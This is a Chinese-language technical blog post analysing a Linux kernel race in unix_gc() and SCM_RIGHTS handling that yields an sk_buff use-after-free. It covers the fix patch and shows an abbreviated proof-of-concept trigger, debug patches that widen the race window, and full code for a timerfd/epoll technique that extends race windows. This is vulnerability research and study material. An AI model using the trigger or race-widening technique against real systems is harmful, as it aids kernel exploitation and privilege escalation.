2023-03-10

Linux 内核利用技巧 Racing against the clock

author: 熊潇 of IceSword Lab

概述

原文: Racing against the clock – hitting a tiny kernel race window

Part.1: 漏洞原理简述
Part.2: 对比较容易产生疑惑的地方增加了细节说明
Part.3: 针对文中提高 race 的技巧做了分析

Part.1

The bug & race

The kernel tries to figure out whether it can account for all references to some file by comparing the file’s refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can’t detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero.

unix_gc() 的预期逻辑是: total_refs 和 inflight_refs 相同就可以认为此时 file 是单独占有的，就可以把 skb 和 file 一起 free 掉
下面代码 (3) 在 (1) 和 (2)中间执行则 race 成功
如果 race 没有成功，__fget_files 那里就会发现 f_count 是 0 或者 file 是 NULL
但是如果 race 成功的话，file->f_count 在 __fget_files() 中会被加 1，unix_gc 后面的代码就不会释放 file 的内存，而只是把 f_count 减 1，这也意味着在 close() 之后依然可以 dup() 成功

dup() -> __fget_files()
    file = files_lookup_fd_rcu(files, fd); // fdt->fd[fd] (1)
    ...
    get_file_rcu_many(file, refs) // update: f_count+1 (2)

close() -> unix_gc()
		list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
	    total_refs = file_count(u->sk.sk_socket->file);  // read f_count: 1 (3)
	    inflight_refs = atomic_long_read(&u->inflight);  // inflight_refs: 1
	    ...
			if (total_refs == inflight_refs) { // compare 
				list_move_tail(&u->link, &gc_candidates);
		        ...

unix_gc() 中 file 和 skb 没有同步释放可能造成的影响？

下面这个方式可以触发 skb UAF:

socketpair() // 获取 socket pair fds: 3, 4
sendmsg(4, 3)  // 通过 fd 4 发送 fd 3
	-> skb_queue_tail(&other->sk_receive_queue, skb); // other 是 fd 4 的 peer 也就是 fd 3， skb 保存了 fd 4 发送的内容也是 fd 3
close(3) | dup(3) // close 和 dup 存在 race，dup 如果 race 成功会返回 fd  3
recvmsg(3)  // 通过 fd 3 接收 fd 4 发送的 skb
	-> last = skb = skb_peek(&sk->sk_receive_queue); // 此时 skb 对应的内存已经被 free 了

skb uaf:

allocated in: sendmsg() -> unix_stream_sendmsg()
freed in: close() -> unix_gc()
uafed in: recvmsg() -> unix_stream_read_generic()

Part.2

SCM_RIGHTS unix socket

SCM_RIGHTS is a socket control message used for passing file descriptors between processes over a UNIX domain socket.

It allows a process to send an open file descriptor to another process, which can then use the file descriptor to read or write to the same file or device.

example

sender.c

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>

/*
 * Send a 5-byte "hello" payload over the connected UNIX socket `sock`,
 * attaching `fd` as SCM_RIGHTS ancillary data.
 *
 * Returns 0 on success, -1 (after printing a diagnostic) if sendmsg() fails.
 */
static int send_fd(int sock, int fd) {
    /* The union forces the control buffer to be aligned for struct cmsghdr. */
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } control;
    memset(&control, 0, sizeof(control));

    char payload[] = "hello";
    struct iovec io = { .iov_base = payload, .iov_len = sizeof(payload) - 1 };

    struct msghdr msg = {0};
    msg.msg_iov = &io;
    msg.msg_iovlen = 1;
    msg.msg_control = control.buf;
    msg.msg_controllen = sizeof(control.buf);

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
    /* Copy instead of casting CMSG_DATA() to int *: avoids alignment/aliasing issues. */
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));

    if (sendmsg(sock, &msg, 0) == -1) {
        perror("sendmsg");
        return -1;
    }
    return 0;
}

/*
 * sender: connect to /tmp/file_transfer.sock, open <file_path> read-only and
 * pass the resulting descriptor to the peer via SCM_RIGHTS.
 *
 * Returns 0 on success, 1 on a usage error or any failed system call.
 */
int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <file_path>\n", argv[0]);
        return 1;
    }

    const char *file_path = argv[1];

    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket");
        return 1;
    }

    struct sockaddr_un addr;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    /* addr is zeroed, so copying at most size-1 bytes keeps sun_path terminated. */
    strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);

    if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
        perror("connect");
        close(sock);
        return 1;
    }

    int fd = open(file_path, O_RDONLY);
    if (fd == -1) {
        perror("open");
        close(sock);
        return 1;
    }

    int rc = (send_fd(sock, fd) == 0) ? 0 : 1;

    /* The receiver owns its own reference once the message is queued. */
    close(fd);
    close(sock);

    return rc;
}

recver.c

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>

/*
 * Receive one message on the connected UNIX socket `conn` and extract the
 * file descriptor carried in its SCM_RIGHTS control message.
 *
 * Returns the received descriptor, or -1 after printing a diagnostic.
 */
static int recv_fd(int conn) {
    char data[256];
    struct iovec io = { .iov_base = data, .iov_len = sizeof(data) };

    /* The union forces the control buffer to be aligned for struct cmsghdr. */
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } control;
    memset(&control, 0, sizeof(control));

    struct msghdr msg = {
        .msg_iov = &io,
        .msg_iovlen = 1,
        .msg_control = control.buf,
        .msg_controllen = sizeof(control.buf),
    };

    if (recvmsg(conn, &msg, 0) == -1) {
        perror("recvmsg");
        return -1;
    }

    /* Reject truncated control data and anything that is not exactly one fd. */
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    if ((msg.msg_flags & MSG_CTRUNC) || cmsg == NULL ||
        cmsg->cmsg_level != SOL_SOCKET || cmsg->cmsg_type != SCM_RIGHTS ||
        cmsg->cmsg_len != CMSG_LEN(sizeof(int))) {
        printf("Invalid message\n");
        return -1;
    }

    int fd;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(fd));
    if (fd == -1) {
        /* errno is not set here, so perror() would print a misleading suffix. */
        fprintf(stderr, "No file descriptor received\n");
        return -1;
    }
    return fd;
}

/*
 * recver: listen on /tmp/file_transfer.sock, accept one connection, receive
 * a file descriptor via SCM_RIGHTS and copy the file's contents to stdout.
 *
 * Returns 0 on success, 1 if any step fails.
 */
int main(int argc, char *argv[]) {
    (void) argc;
    (void) argv;

    static const char sock_path[] = "/tmp/file_transfer.sock";

    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket");
        return 1;
    }

    struct sockaddr_un addr;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, sock_path, sizeof(addr.sun_path) - 1);

    /* A socket file left over from a previous run would make bind() fail. */
    unlink(sock_path);

    if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
        perror("bind");
        close(sock);
        return 1;
    }

    if (listen(sock, 1) == -1) {
        perror("listen");
        close(sock);
        unlink(sock_path);
        return 1;
    }

    int client_sock = accept(sock, NULL, NULL);
    if (client_sock == -1) {
        perror("accept");
        close(sock);
        unlink(sock_path);
        return 1;
    }

    int rc = 1;
    int fd = recv_fd(client_sock);
    if (fd != -1) {
        /* Do something with the received file descriptor: dump it to stdout. */
        char buf2[256];
        ssize_t bytes_read;
        while ((bytes_read = read(fd, buf2, sizeof(buf2))) > 0) {
            /* read() does not NUL-terminate, so write exactly what was read. */
            fwrite(buf2, 1, (size_t) bytes_read, stdout);
        }
        if (bytes_read == -1) {
            perror("read");
        } else {
            rc = 0;
        }
        close(fd);
    }

    close(client_sock);
    close(sock);
    unlink(sock_path);

    return rc;
}

Unix socket `sendmsg()` and `recvmsg()`

用于发送和接收 SCM_RIGHTS unix socket 数据的主要处理函数是: unix_stream_sendmsg 和 unix_stream_read_generic
特殊的地方在于：
- sendmsg 的时候会创建 skb 并放到接收端的 sk_receive_queue 上，同时把被传递的 socket 对应的 unix_sock 挂到全局列表 gc_inflight_list 上
- 发送的 fd 对应的 file 会绑定到 skb 上(f_count 也会加 1)
- recvmsg 的时候从 sk_receive_queue 取 skb
- unix_gc 则遍历 gc_inflight_list 上的 unix_sock，再从它们的 sk_receive_queue 中找到要处理的 skb

// net/socket.c
sendmsg() -> __sys_sendmsg() -> sock_sendmsg()-> sock_sendmsg_nosec() 
	-> // sock->ops->sendmsg
     unix_stream_sendmsg() // struct unix_stream_ops 
        **__scm_send()** 
            scm_fp_copy()
                fget_raw(fd)
										...
	                __fget_files() // 每个被传递的 fd 引用加 1
        other = unix_peer(sk);
        skb = sock_alloc_send_pskb()
        **unix_scm_to_skb()**
            unix_attach_fds() // fd 与 skb 绑定
                unix_inflight()
	                list_add_tail(&u->link, &**gc_inflight_list**); // unix_gc 处理的队列 
						 **skb->destructor = unix_destruct_scm;** // 注册 skb destruct
        skb_queue_tail(&other->**sk_receive_queue**, skb); // skb 直接放到 peer 的 sk_receive_queue 队列上

recvmsg() -> __sys_recvmsg() -> ...
	-> // sock->ops->recvmsg
     unix_stream_recvmsg()
        unix_stream_read_generic()
            last = skb = skb_peek(&sk->sk_receive_queue);// 取 skb
            scm_recv() // 处理 fd
                scm_detach_fds()
											receive_fd_user() // 接收 fd
												..
													fd_install(new_fd, get_file(file));
                    __scm_destroy() // 释放 skb 绑定的 fd 引用
                        fput()
                          fput_many()

**struct sk_buff *skb, struct unix_sock *u, struct socket *sock, struct sock *sk 和 struct file *file 之间的关系？**

struct socket *sock = &container_of(file->f_inode, 
																struct socket_alloc, vfs_inode)->socket
struct sock *sk = sock->sk

struct unix_sock *u = (struct unix_sock *)sk

struct file *file = u->sk.sk_socket->file

struct file *file = (*(struct unix_skb_parms *)&((skb)->cb)).fp->fp[i]

`unix_gc()` 做了什么？

遍历 gc_inflight_list 获取 unix_sock 对象
- 把满足条件的 unix_sock 添加到 gc_candidates
- 条件：unix_sock 的文件引用和 skb 引用值相同
遍历 gc_candidates
- 把满足条件的 skb 添加到 hitlist
释放 hitlist 上的 skb 内存和与之绑定的 struct file

unix_gc()
	struct sk_buff_head hitlist;
	...
	list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
		total_refs = file_count(u->sk.sk_socket->file);
		inflight_refs = atomic_long_read(&u->inflight);
		if (total_refs == inflight_refs) {
			list_move_tail(&u->link, &gc_candidates);
	}
	...

	skb_queue_head_init(&hitlist);
	list_for_each_entry(u, &gc_candidates, link)
		scan_children(&u->sk, inc_inflight, &hitlist);
			scan_inflight(&u->sk, func, hitlist);
				__skb_queue_tail(hitlist, skb);
	...
	__skb_queue_purge(&hitlist);
		kfree_skb(skb);

unix_gc() 中 file 和 skb 在哪里 free ?

unix_gc()
	...
	skb_queue_head_init(&hitlist);
	list_for_each_entry(u, &gc_candidates, link) // 从gc_candidates取skb到hitlist
		scan_children(&u->sk, inc_inflight, &hitlist);
			scan_inflight(&u->sk, func, hitlist);
				__skb_queue_tail(hitlist, skb);
	...
	__skb_queue_purge(&hitlist); // (4)
		kfree_skb(skb);
		...
			**skb->destructor() // 在 sendmsg 设置
				unix_destruct_scm()**
					scm_destroy()
						__scm_destroy()
							**fput() // 如果 f_count 是 1 则减到 0 然后释放 file**
			kfree_skbmem()
				**kmem_cache_free(.., skb) // 释放 skb**

// unix_destruct_scm 在 sendmsg 设置
sendmsg()
  __sys_sendmsg()
    sock_sendmsg()
      sock_sendmsg_nosec()
        unix_stream_sendmsg() // struct unix_stream_ops 
          skb = sock_alloc_send_pskb()
          unix_scm_to_skb()
							**skb->destructor = unix_destruct_scm;**

`unix_gc()` 何时被调用？

close() 可以间接触发
- 具体入口是 syscall_exit_to_user_mode() -> __fput()
sendmsg() 也可以触发，但只在 inflight socket 数量超过 UNIX_INFLIGHT_TRIGGER_GC 的时候
- sendmsg() -> wait_for_unix_gc()

// close() 一个 f_count 为 1 的文件时触发
close()
    close_fd()
        filp_close()
            fput()
	            fput_many(file, 1);
                    atomic_long_sub_and_test(refs, &file->f_count) 
	                    init_task_work(&file->f_u.fu_rcuhead, ____fput)
	                    task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)
entry_SYSCALL_64 
	do_syscall_64
		syscall_exit_to_user_mode
			...
				tracehook_notify_resume
					task_work_run()
						__fput() 
							sock_close()  // (struct file *) ->f_op->release()
								__sock_release() 
									unix_release()  // (struct socket *) ->ops->release()
										unix_release_sock() 
											**unix_gc()**

// 只有 inflight sockets 超过 UNIX_INFLIGHT_TRIGGER_GC (16000) 才会调用
sendmsg()
	...
		unix_stream_sendmsg()/unix_dgram_sendmsg()
			wait_for_unix_gc()
				if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
					**unix_gc();**

dup() 的作用和实现原理？

根据 fd 从 fd table 中获取 struct file *file
如果 f_count 不为 0 则 file->f_count += 1
fd table 中新建一个条目指向 file

SYSCALL_DEFINE1(dup, unsigned int, fildes)
    fget_raw()
        __fget(fd, FMODE_PATH, 1)
            __fget_files(current->files, fd, mask, refs)
									file = files_lookup_fd_rcu(files, fd);// 根据 fd 从 fd table 中获取 struct file *file
                get_file_rcu_many(file, refs) 
										atomic_long_add_unless(&(x)->f_count, (cnt), 0) // if not 0, file->f_count += 1
		get_unused_fd_flags()
		fd_install() // fd table 中新建一个条目指向 file

`close()` 的作用和实现原理？

使 fd 重新可用
把 fd table 中 fd 对应的条目删除(设置为 NULL)
fd table 中原来指向的 struct file 的 f_count 减 1，如果减到 0 则释放 struct file 的内存
close 不一定会立马释放 struct file, 但是用户态不能再访问该 fd，比如dup(fd),read(fd) ..

close()
    close_fd()
        pick_file()
	        fdt = files_fdtable(files);
	        file = fdt->fd[fd];
	        **rcu_assign_pointer(fdt->fd[fd], NULL); // fd table 中 fd 对应的条目删除
	        __put_unused_fd(files, fd); // 使 fd 重新可用**
        filp_close()
            **fput()**
	            fput_many(file, 1); // fd table 中原来指向的 struct file 的 f_count 减 1
                    atomic_long_sub_and_test(refs, &file->f_count)
                    **init_task_work(&file->f_u.fu_rcuhead, ____fput)**
                    task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)

____fput()
	__fput()
		file_free()
			file_free_rcu()
				**kmem_cache_free(filp_cachep, f) // 如果减到 0 则释放 struct file 的内存**

增加 kernel delay patch 的 poc 如何 work ?

line-27 将 pair[0] f_count +1 并添加到 gc_inflight_list 和 sk_receive_queue
line-29 和 line-43 用于触发 unix_gc() 调用, 因为需要一个 f_count 为 1 的 fd 被 close()
line-36 用于等待 resurrect_fn()->dup()->__fget_files() 调用进入 race window 拿到 struct file , 因为 line-37 会把 pair[0] 从 fd table 中移除。 usleep 的时间 100000 us 要小于 kernel patch 的 500ms
line-43 会在 __fget_files() 等待的期间执行 unix_gc() , 在执行到准备释放 skb 的代码时，会等待 line-11 的 dup() 完成。
dup() 完成后执行到 line-16 的 recvmsg() ，内核会等待 line-43 触发的 unix_gc() 完成 skb 的释放
unix_gc() 完成后，recvmsg() 继续执行拿到被释放的 skb，UAF

省略版 POC：

1 void send_fd(int sock, int fd) {
2 ...
3     sendmsg(sock, &msg, 0);
4 }
5
6 int resurrect_fd = -1;
7 int resurrected_fd = -1;
8
9 void *resurrect_fn(void *arg) {
10   prctl(PR_SET_NAME, "SLOW-ME"); // tell kernel to inject mdelay()
11   resurrected_fd = dup(resurrect_fd);
12   prctl(PR_SET_NAME, "resurrect");
13
14   prctl(PR_SET_NAME, "SLOW-RECV");
15 ...
16   int recv_bytes = recvmsg(resurrected_fd, &msg, MSG_DONTWAIT);
17   prctl(PR_SET_NAME, "resurrect");
18
19   return NULL;
20 }
21
22 int main(void) {
23   /* create socketpair  */
24   int pair[2];
25   socketpair(AF_UNIX, SOCK_STREAM, 0, pair);
26
27   send_fd(pair[1], pair[0]);
28
29   int trigger_sock = socket(AF_UNIX, SOCK_DGRAM, 0);
30
31   resurrect_fd = pair[0];
32
33   pthread_t resurrect_thread;
34   pthread_create(&resurrect_thread, NULL, resurrect_fn, NULL);
35
36   usleep(100000); /* wait for fget_raw() to see pointer */
37   close(pair[0]);
38
39   /*
40    * trigger unix GC; has to read file_count() before file inc
41    * but do hitlist kill after file inc
42    */
43   close(trigger_sock);
44
45   /* make sure dup() has really finished */
46   pthread_join(resurrect_thread, NULL);
47
48 }

kernel patch 增加三个 mdelay

@@ -850,6 +852,13 @@ static struct file *__fget_files(struct files_struct *files, unsigned int fd,
 loop:
        file = files_lookup_fd_rcu(files, fd);
        if (file) {
+               if (strcmp(current->comm, "SLOW-ME") == 0) {
+                       pr_warn("slowing lookup of fd %u to file 0x%lx with %ld refs\n",
+                               fd, (unsigned long)file, file_count(file));
**+                       mdelay(500);**
+                       pr_warn("slowed lookup of fd %u to file 0x%lx with %ld refs\n",
+                               fd, (unsigned long)file, file_count(file));
+               }

...
@@ -2631,6 +2633,12 @@ static int unix_stream_read_generic(struct unix_stream_read_state *state,
                last = skb = skb_peek(&sk->sk_receive_queue);
                last_len = last ? last->len : 0;
 
+               if (strcmp(current->comm, "SLOW-RECV") == 0) {
+                       pr_warn("recvmsg: delaying stream receive\n");
+                       mdelay(500);
+                       pr_warn("recvmsg: delayed stream receive\n");
+               }
+
...
@@ -210,8 +212,11 @@ void unix_gc(void)
...
        skb_queue_head_init(&hitlist);
+       if (strcmp(current->comm, "resurrect") == 0) {
+               pr_warn("unix: delaying hitlist setup\n");
+               mdelay(500);
+               pr_warn("unix: hitlist setup delay done\n");
+       }
        list_for_each_entry(u, &gc_candidates, link)
                scan_children(&u->sk, inc_inflight, &hitlist);

fixed patch 如何 work ?

补丁效果：在 race window 期间,如果 fd 对应的 struct file 已经从 fd table 移除，则回退对 f_count 的操作，如果发现回退后变为 0 则直接释放 struct file

diff --git a/fs/file.c b/fs/file.c
index 8627dacfc4246..ad4a8bf3cf109 100644
--- a/fs/file.c
+++ b/fs/file.c
@@ -858,6 +858,10 @@ loop:
 			file = NULL;
 		else if (!get_file_rcu_many(file, refs))
 			goto loop;
+		else if (files_lookup_fd_raw(files, fd) != file) {
+			fput_many(file, refs);
+			goto loop;
+		}
 	}
 	rcu_read_unlock();

Part.3

如何利用 hrtimer 扩大 race 成功率？

timerfd_create + timerfd_settime 可以在指定时间(纳秒)后触发 timer interrupt
timer interrupt handler 会调用 __wake_up_common 遍历 wait queue 并执行回调函数。这意味着 wait queue 越长，处在 interrupt context 的时间越长
利用这一点可以让进程在 race window 中被中断，然后在另一个 CPU 上运行需要与之 race 的进程

wait queue item 在哪里添加和读取 ?

每一个 EPOLL_CTL_ADD 会在 timer_fd 的 wait queue 上添加一个执行 ep_poll_callback 的 entry
在 timerfd_triggered 中从 timer_fd 的 wait queue 中取出 entry

// epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j]

do_epoll_ctl() // 在 ep_ptable_queue_proc 中添加 wait_queue_entry
	ep_insert(struct eventpoll *ep, ..
		struct ep_pqueue epq;
		init_poll_funcptr(&epq.pt, **ep_ptable_queue_proc**); // epq.pt._qproc = **ep_ptable_queue_proc**
		ep_item_poll(epi, &epq.pt, 1);
			vfs_poll
				timerfd_poll // struct file_operations timerfd_fops.poll
					struct timerfd_ctx *ctx = file->private_data;
					poll_wait(file, &ctx->wqh, wait); // &ctx->wqh: whead, wait: &epq.pt, (include/linux/poll.h)
						**ep_ptable_queue_proc**(struct file *file, wait_queue_head_t *whead, poll_table *pt)
							struct epitem *epi = ep_item_from_epqueue(pt);
							struct eppoll_entry *pwq;
							...
							pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);
						  ...
							**init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);**
							...
							**add_wait_queue(whead, &pwq->wait); // whead:** &ctx->wqh
							...

/*
 * Pairs the poll_table handed to the file's ->poll() with the epitem being
 * inserted; ep_ptable_queue_proc() gets back to the epitem from the
 * poll_table pointer via ep_item_from_epqueue().
 */
struct ep_pqueue {
    poll_table pt;       /* passed down to vfs_poll() / poll_wait() */
    struct epitem *epi;  /* the epoll item this registration belongs to */
};

/*
 * Poll registration table: poll_wait() invokes _qproc with the file, the
 * wait queue head and this table; for epoll, _qproc is ep_ptable_queue_proc
 * (installed by init_poll_funcptr()).
 */
struct poll_table_struct {
    poll_queue_proc _qproc; // void (*)(struct file *, wait_queue_head_t *, struct poll_table_struct *)
    __poll_t _key;
};

local_apic_timer_interrupt()
	**hrtimer_interrupt()**
		...
		timerfd_tmrproc()
			**timerfd_triggered()** 
				**spin_lock_irqsave(&ctx->wqh.lock, flags);** // 关中断
				ctx->expired = 1;
				ctx->ticks++;
				wake_up_locked_poll(**&ctx->wqh**, EPOLLIN);
					**__wake_up_common() // 遍历 wait queue, 执行 callback**
						wait_queue_entry_t *curr, *next;
						**list_for_each_entry_safe_from(curr, next, &wq_head->head, entry)** 
							ret = curr->func(curr, mode, wake_flags, key); // ep_poll_callback
				spin_unlock_irqrestore(&ctx->wqh.lock, flags);

**timerfd_tmrproc 在 timerfd_setup 中设置**

static int timerfd_setup(struct timerfd_ctx *ctx, int flags,
			 const struct itimerspec64 *ktmr)
..
	hrtimer_init(&ctx->t.tmr, clockid, htmode);
	hrtimer_set_expires(&ctx->t.tmr, texp);
	ctx->t.tmr.function = timerfd_tmrproc;

**struct timerfd_ctx, struct file , struct hrtimer 之间的关系**

struct timerfd_ctx *ctx = file->private_data;

struct hrtimer *htmr = &ctx->t.tmr;

struct timerfd_ctx *ctx = container_of(htmr, struct timerfd_ctx, t.tmr);

测试代码：

向 wait queue 中添加 500 * 500 个 entry

#define _GNU_SOURCE

#include <err.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>
#include <sys/epoll.h>
#include <sys/timerfd.h>

/*
 * SYSCHK(expr): evaluate expr exactly once. If the result equals -1 (cast to
 * the expression's own type), report "SYSCHK(<expr text>)" together with the
 * errno description via err() and exit with status 1; otherwise yield the
 * result as the value of the macro.
 *
 * Uses a GNU statement expression. __typeof__ is spelled with underscores so
 * the macro also works under strict -std=c11, and the temporary avoids the
 * reserved "__" identifier prefix.
 */
#define SYSCHK(x) ({                       \
  __typeof__(x) syschk_res_ = (x);         \
  if (syschk_res_ == (__typeof__(x))-1)    \
    err(1, "SYSCHK(" #x ")");              \
  syschk_res_;                             \
})

#define NUM_EPOLL_INSTANCES 500
#define NUM_DUP_FDS 500
#define NUM_TIMER_WAITERS (NUM_EPOLL_INSTANCES * NUM_DUP_FDS)

#define NSEC_PER_SEC 1000000000UL // 1s = 1000000000ns

/*
 * Restrict task `pid` to run only on CPU `cpu`.
 *
 * Builds an affinity mask with just that one CPU set and applies it with
 * sched_setaffinity(). SYSCHK terminates the program (via err()) if the
 * call returns -1, so this function only returns on success.
 */
void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);      /* start from an empty CPU mask */
  CPU_SET(cpu, &cset);  /* allow exactly one CPU */
  /* The argument text below is stringified into SYSCHK's error message. */
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
/* Pin the caller to `cpu`: forwards to pin_task_to() with pid 0. */
void pin_to(int cpu) {
  pin_task_to(0, cpu);
}

/*
 * Return the current CLOCK_MONOTONIC time.
 *
 * Exits via err() if clock_gettime() fails, so callers never receive an
 * uninitialized timespec.
 */
struct timespec get_mono_time(void) {
  struct timespec ts = {0};
  if (clock_gettime(CLOCK_MONOTONIC, &ts) == -1)
    err(1, "clock_gettime(CLOCK_MONOTONIC)");
  return ts;
}

/*
 * Advance *ts by `nsecs` nanoseconds, keeping tv_nsec normalized.
 *
 * `ts` must already be normalized (0 <= tv_nsec < NSEC_PER_SEC). Whole
 * seconds contained in `nsecs` are carried into tv_sec first, so any value
 * of `nsecs` (not just values below one second) leaves tv_nsec in range.
 */
void ts_add(struct timespec *ts, unsigned long nsecs) {
  ts->tv_sec += (time_t)(nsecs / NSEC_PER_SEC);
  ts->tv_nsec += (long)(nsecs % NSEC_PER_SEC);
  /* Both addends were below one second, so at most one carry remains. */
  if (ts->tv_nsec >= (long)NSEC_PER_SEC) {
    ts->tv_sec++;
    ts->tv_nsec -= (long)NSEC_PER_SEC;
  }
}

/*
 * Demo: register NUM_EPOLL_INSTANCES * NUM_DUP_FDS epoll watches on a single
 * timerfd, arm the timer one second ahead, wait until every epoll instance
 * reports it, then print the timer's expiration count.
 *
 * Needs NUM_EPOLL_INSTANCES + NUM_DUP_FDS + 1 descriptors besides stdio.
 * Returns 0 on success, 1 if any system call fails.
 */
int main(void) {
    pin_to(0);

    int timerfd = timerfd_create(CLOCK_MONOTONIC, 0);
    if (timerfd < 0) {
        perror("timerfd_create");
        return 1;
    }

    // Create the epoll instances
    int epoll_fds[NUM_EPOLL_INSTANCES];
    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        epoll_fds[i] = epoll_create1(0);
        if (epoll_fds[i] < 0) {
            perror("epoll_create1");
            return 1;
        }
    }

    // Duplicate the timer fd; every duplicate refers to the same timerfd file
    int timer_fds[NUM_DUP_FDS];
    for (int i = 0; i < NUM_DUP_FDS; i++) {
        timer_fds[i] = dup(timerfd);
        if (timer_fds[i] < 0) {
            perror("dup");
            return 1;
        }
    }

    // Each EPOLL_CTL_ADD registers one more watch on the timerfd
    struct epoll_event ev = { 0 };
    ev.events = EPOLLIN;
    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        for (int j = 0; j < NUM_DUP_FDS; j++) {
            ev.data.fd = timer_fds[j];
            if (epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], &ev) < 0) {
                perror("epoll_ctl");
                return 1;
            }
        }
    }

    struct timespec base_time = get_mono_time();

    struct itimerspec timer_value = { .it_value = base_time };
    ts_add(&timer_value.it_value, 1000 * 1000 * 1000); // timer at +1s

    if (timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &timer_value, NULL) < 0) {
        perror("timerfd_settime");
        return 1;
    }

    // Block on every epoll instance until it reports the timer as readable
    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        int nfds = epoll_wait(epoll_fds[i], &ev, 1, -1);
        if (nfds < 0) {
            perror("epoll_wait");
            return 1;
        }
    }

    // A timerfd read yields an unsigned 64-bit expiration count
    uint64_t value = 0;
    ssize_t got = read(timerfd, &value, sizeof(value));
    if (got != (ssize_t) sizeof(value)) {
        if (got < 0)
            perror("read");
        else
            fprintf(stderr, "read: short read (%zd bytes)\n", got);
        return 1;
    }
    printf("value:  %" PRIu64 "\n", value);

    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        close(epoll_fds[i]);
    }
    for (int i = 0; i < NUM_DUP_FDS; i++) {
        close(timer_fds[i]);
    }
    close(timerfd);
    return 0;
}

如何观测延迟效果？

在 GDB 中可以查看队列中的 entry，数量与设置的一致

b timerfd_triggered
set $head = &ctx.wqh.head
set $node = $head
while $node.next != $head
p $node.next
set $node = $node.next
end
p *$head

加一点 patch 用 rdtsc 可以粗略测量一下延迟效果

**0xffffffff81b8b67e <+49>:	rdtsc**
0xffffffff81b8b680 <+51>:	shl    rdx,0x20
0xffffffff81b8b684 <+55>:	or     rax,rdx
0xffffffff81b8b687 <+58>:	lea    r12,[rbx+0x88]
0xffffffff81b8b68e <+65>:	mov    r14,rax
0xffffffff81b8b691 <+68>:	mov    rdi,r12
0xffffffff81b8b694 <+71>:	call   0xffffffff81bde9d0 <_raw_spin_lock_irqsave>
0xffffffff81b8b699 <+76>:	inc    QWORD PTR [rbx+0xa0]
0xffffffff81b8b6a0 <+83>:	mov    edx,0x1
0xffffffff81b8b6a5 <+88>:	mov    rdi,r12
0xffffffff81b8b6a8 <+91>:	mov    WORD PTR [rbx+0xac],0x1
0xffffffff81b8b6b1 <+100>:	mov    r13,rax
0xffffffff81b8b6b4 <+103>:	mov    esi,0x3
0xffffffff81b8b6b9 <+108>:	call   0xffffffff810ad650 <__wake_up_locked_key>
0xffffffff81b8b6be <+113>:	mov    rsi,r13
0xffffffff81b8b6c1 <+116>:	mov    rdi,r12
0xffffffff81b8b6c4 <+119>:	call   0xffffffff81bde5b0 <_raw_spin_unlock_irqrestore>
**0xffffffff81b8b6c9 <+124>:	rdtsc**

diff --git a/fs/timerfd.c b/fs/timerfd.c
index e9c96a0c79f1..b919b24b4d48 100644
--- a/fs/timerfd.c
+++ b/fs/timerfd.c
@@ -64,11 +64,20 @@ static void timerfd_triggered(struct timerfd_ctx *ctx)
 {
        unsigned long flags;

+    u64 start_time, end_time;
+
+    pr_warn("[%s] %s enter\n", current->comm, __func__);
+
+    asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+              : "=a"(start_time) :: "%rdx");
        spin_lock_irqsave(&ctx->wqh.lock, flags);
        ctx->expired = 1;
        ctx->ticks++;
        wake_up_locked_poll(&ctx->wqh, EPOLLIN);
        spin_unlock_irqrestore(&ctx->wqh.lock, flags);
+    asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+              : "=a"(end_time) :: "%rdx");
+    pr_warn("[%s] %s exit, %lld\n", current->comm, __func__, end_time - start_time);
 }

